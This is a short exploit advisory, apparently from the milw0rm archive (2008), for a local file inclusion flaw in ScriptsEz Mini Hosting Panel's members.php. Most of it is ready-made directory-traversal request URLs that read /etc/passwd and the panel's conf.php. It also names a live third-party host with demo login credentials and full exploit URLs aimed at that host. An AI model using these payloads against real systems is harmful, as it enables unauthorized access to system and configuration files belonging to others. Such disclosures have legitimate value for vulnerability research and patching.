28 lines
No EOL
955 B
Text
28 lines
No EOL
955 B
Text
# ScriptsEz Mini Hosting Panel (members.php) Local File Inclusion Vulnerability
|
|
# url: http://www.scriptsez.net/
|
|
#
|
|
# Author: JosS
|
|
# mail: sys-project[at]hotmail[dot]com
|
|
# site: http://spanish-hackers.com
|
|
# team: Spanish Hackers Team - [SHT]
|
|
#
|
|
# This was written for educational purpose. Use it at your own risk.
|
|
# Author will be not responsible for any damage.
|
|
|
|
vuln file: members.php
|
|
|
|
PoC: /members.php?act=view&p=[FILE]&dir=[DIR]
|
|
Exploits:
|
|
/etc/passwd/ --> /members.php?act=view&p=passwd&dir=../../../../../../../../../../../../etc/
|
|
conf.php --> /members.php?act=view&p=conf.php&dir=/test/../../..
|
|
|
|
live demo:
|
|
http://hosting.cgixp.apkafuture.com/index.php?action=login
|
|
demo:demo (user login)
|
|
|
|
http://hosting.cgixp.apkafuture.com/members.php?act=view&p=passwd&dir=../../../../../../../../../../../../etc/
|
|
http://hosting.cgixp.apkafuture.com/members.php?act=view&p=conf.php&dir=/test/../../..
|
|
|
|
Ingenious work :D
|
|
|
|
# milw0rm.com [2008-10-09] |